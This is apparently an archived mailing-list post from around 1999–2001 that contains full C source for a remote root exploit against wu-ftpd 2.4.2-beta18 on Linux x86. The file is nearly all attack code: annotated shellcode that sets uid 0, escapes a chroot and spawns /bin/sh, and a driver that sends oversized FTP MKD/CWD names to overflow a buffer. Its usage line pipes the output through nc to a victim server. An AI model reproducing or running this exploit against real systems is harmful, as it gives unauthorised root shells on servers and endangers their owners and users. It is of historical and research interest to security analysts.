/* wu-ftpd mkdir v2.4.2-beta18 remote rewt spl01t v1.20 ( linux x86 ) by joey__ <youcan_reachmeat_private> of rhino9 <http://www.rhino9.com> - 2/20/99 big thx horizon, duke, nimrood and icee sh0utz neonsurge, xaphan, joc, sri, aalawaka, and aakanksha USAGE: ( ./wh0a [ initialdir ] [ <username> <password> ] [ <offset> <code address> ] ; cat ) | nc <victimname> <victimport> */ #include <stdio.h> char x86_shellcode0[156] = "\x83\xec\x04" /* sub esp,4 */ /* esi -> local variables and data */ "\x5e" /* pop esi */ "\x83\xc6\x70" /* add esi,0x70 */ "\x83\xc6\x20" /* add esi,0x20 */ "\x8d\x5e\x0c" /* lea ebx,[esi+0x0c] */ /* decode the strings */ "\x31\xc9" /* xor ecx, ecx */ "\xb1\x30" /* mov cl,0x30 */ "\x80\x2b\x32" /* sub byte ptr [ebx],0x32 */ "\x43" /* inc ebx */ "\x49" /* dec ecx */ "\x75\xf9" /* jnz short decode_next_byte */ "\x31\xc0" /* xor eax,eax */ /* setuid ( 0 ) */ "\x89\xc3" /* mov ebx,eax */ "\xb0\x17" /* mov al,0x17 */ "\xcd\x80" /* int 0x80 */ "\x31\xc0" /* xor eax,eax */ /* setgid ( 0 ) */ "\x89\xc3" /* mov ebx,eax */ "\xb0\x2e" /* mov al,0x2e */ "\xcd\x80" /* int 0x80 */ /* To break chroot we have to... fd = open ( ".", O_RDONLY ); mkdir ( "hax0r", 0666 ); chroot ( "hax0r" ); fchdir ( fd ); for ( i = 0; i < 254; i++ ) chdir ( ".." ); chroot ( "." ); */ "\x31\xc0" /* xor eax,eax */ /* var0 = open ( ".", O_RDONLY ) */ "\x31\xc9" /* xor ecx,ecx */ "\x8d\x5e\x0f" /* lea ebx,[esi+0x0f] */ "\xb0\x05" /* mov al,0x05 */ "\xcd\x80" /* int 0x80 */ "\x89\x06" /* mov [esi],eax */ "\x31\xc0" /* xor eax,eax */ /* mkdir ( "hax0r", 0666 ) */ "\x8d\x5e\x11" /* lea ebx,[esi+0x11] */ "\x8b\x4e\x1f" /* mov ecx,[esi+0x1f] */ "\xb0\x27" /* mov al,0x27 */ "\xcd\x80" /* int 0x80 */ "\x31\xc0" /* xor eax,eax */ /* chroot ( "hax0r" ) */ "\x8d\x5e\x11" /* lea ebx,[esi+0x11] */ "\xb0\x3d" /* mov al,0x3d */ "\xcd\x80" /* int 0x80 */ "\x31\xc0" /* xor eax,eax */ /* fchdir ( fd ) */ "\x8b\x1e" /* mov ebx,[esi] */ "\xb0\x85" /* mov al,0x85 */ "\xcd\x80" /* int 0x80 */ "\x31\xc9" /* xor ecx, ecx */ /* for ( i = 0; i < 254; i++ ) { */ "\xb1\xfe" /* mov cl,0xfe */ "\x31\xc0" /* xor eax,eax */ /* chdir ( ".." ) */ "\x8d\x5e\x0c" /* lea ebx,[esi+0x0c] */ "\xb0\x0c" /* mov al,0x0c */ "\xcd\x80" /* int 0x80 */ "\x49" /* dec ecx */ /* } */ "\x75\xf4" /* jnz short goto_parent_dir */ "\x31\xc0" /* xor eax,eax */ /* chroot ( "." ) */ "\x8d\x5e\x0f" /* lea ebx,[esi+0x0f] */ "\xb0\x3d" /* mov al,0x3d */ "\xcd\x80" /* int 0x80 */ "\x31\xc0" /* xor eax,eax */ /* execve ( "/bin/sh", "xxxxx", NULL ) */ "\x8d\x5e\x17" /* lea ebx,[esi+0x17] */ "\x8d\x4e\x04" /* lea ecx,[esi+0x04] */ "\x8d\x56\x08" /* lea edx,[esi+0x08] */ "\x89\x19" /* mov [ecx],ebx */ "\x89\x02" /* mov [edx],eax */ "\xb0\x0b" /* mov al, 0x0b */ "\xcd\x80" /* int 0x80 */ "\x31\xdb" /* xor ebx,ebx */ /* exit ( 0 ) */ "\x89\xd8" /* mov eax,ebx */ "\x40" /* inc eax */ "\xcd\x80" /* int 0x80 */ "\x90" "\x90" "\x90" "\x90" "\x90" "\x90" "\x90" "\x90" "\x90" "\x90" "\x90" "var0" /* local variable integer */ "cmd0" /* char *cmd[2] */ "cmd1"; char x86_shellcode1[1024] = ".." "\x00" "." "\x00" "hax0r" "\x00" "/bin/sh" "\x00" "\xb6\x01\x00\x00"; char vardir[300]; int varlen; main ( int argc, char **argv ) { char *username, *password, *initialdir; int bufoffset, codeaddr, i, j, *pcodeaddr; if ( argc > 1 ) initialdir = argv[1]; else initialdir = "/incoming"; if ( argc > 3 ) { username = argv[2]; password = argv[3]; } else { username = "anonymous"; password = "poonat_private"; } if ( argc > 5 ) { bufoffset = atoi ( argv[4] ); codeaddr = atoi ( argv[5] ); } else { bufoffset = 195; codeaddr = 0x0805ac81; } printf ( "user %s\n", username ); printf ( "pass %s\n", password ); printf ( "cwd %s\n", initialdir ); varlen = bufoffset - strlen ( initialdir ); for ( i = 0; i < varlen; i++ ) vardir[i] = 'x'; vardir[varlen] = 0; printf ( "mkd %s\n", vardir ); printf ( "cwd %s\n", vardir ); varlen = 210; for ( i = 0; i < varlen; i++ ) vardir[i] = 'x'; vardir[varlen] = 0; printf ( "mkd %s\n", vardir ); printf ( "cwd %s\n", vardir ); varlen = 210; for ( i = 0; i < varlen; i++ ) vardir[i] = 'x'; vardir[varlen] = 0; printf ( "mkd %s\n", vardir ); printf ( "cwd %s\n", vardir ); varlen = 170; for ( i = 0; i < varlen; i++ ) vardir[i] = 'x'; vardir[varlen] = 0; printf ( "mkd %s\n", vardir ); printf ( "cwd %s\n", vardir ); varlen = 250; for ( i = 0; i < varlen; i++ ) vardir[i] = 'x'; for ( i = 0; i < sizeof ( x86_shellcode0 ); i++ ) vardir[i] = x86_shellcode0[i]; j = 0; for ( i = sizeof ( x86_shellcode0 ); j < 32; i++ ) { vardir[i] = ( char ) ( x86_shellcode1[j++] + 0x32 ); } pcodeaddr = ( int * ) &( vardir[varlen] ); *pcodeaddr = codeaddr; vardir[varlen+4] = 0; printf ( "mkd %s\n", vardir ); }
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:39:50 PDT